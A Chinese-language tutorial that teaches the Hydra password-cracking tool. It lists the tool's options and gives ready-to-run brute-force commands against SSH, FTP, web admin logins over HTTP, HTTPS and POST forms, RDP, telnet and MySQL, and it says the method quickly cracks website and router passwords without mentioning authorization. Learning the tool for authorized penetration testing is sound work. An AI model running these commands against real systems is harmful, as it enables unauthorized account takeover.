hydra是一款强大的密码破解工具，又名九头蛇，支linux,windows,mac等多平台。并且支持多种密码协议的破解，本文带领大家一起来学习吧！

安装

在kali中，hydra已经默认安装。我们终端输入命令hydra即可运行。当然其他系统也可以安装。

apt-get install hydra
yum install hydra

常用参数

• -l 指定用户名进行破解
• -L 指定用户的用户名字典
• -p 用于指定密码破解
• -P 用于指定密码字典。
• -M 指定目标ip列表文件，批量破解。
• -o 指定结果输出文件
• -t 同时运行的线程数，默认是16
• -w 设置最大超时时间，单位
• -v 显示详细过程
• -R 恢复爆破（如果破解中断了，下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。）
• -x 自定义密码。

牛刀小试

破解ssh

hydra -L user.txt -P pass.txt -t 10 -o save.log -vV 192.168.123.1 ssh

如上，我们得到了ssh的账号和密码均为admin

破解ftp

hydra ftp://192.168.123.173 -L user.txt -P pass.txt -t 10 -vV

web后台登录

hydra -L user.txt -P pass.txt -t 10 -vV -e ns 192.168.123.1 http-get 

利用这种方法，我们可以快速的破解网站后台密码或者路由器登录密码。如果网站后台是http://xxx.com/admin我们需要在上面的命令后面添加参数 /admin

HTTPS 破解

现在很多的站点都支持https。因此我们需要下面的命令。

hydra -m /admin -L user.txt -P pass.txt 192.168.123.1 https

POST请求

post请求相对前面比较麻烦，我们需要简单的分析post的数据结构。

hydra -t 3 -L user.txt -P pass.txt -o out.txt -f 192.168.123.173 -s 8888  http-post-form "/:id=^USER^&passwd=^PASS^:wrong username or password"

效果如下：

rdp（远程桌面）

hydra 192.168.123.15 rdp -l administrator -P pass.txt -V

telnet 破解

hydra 192.168.123.173 telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

mysql 破解

hydra -l root –p pass.txt –e ns 127.0.0.1 mysql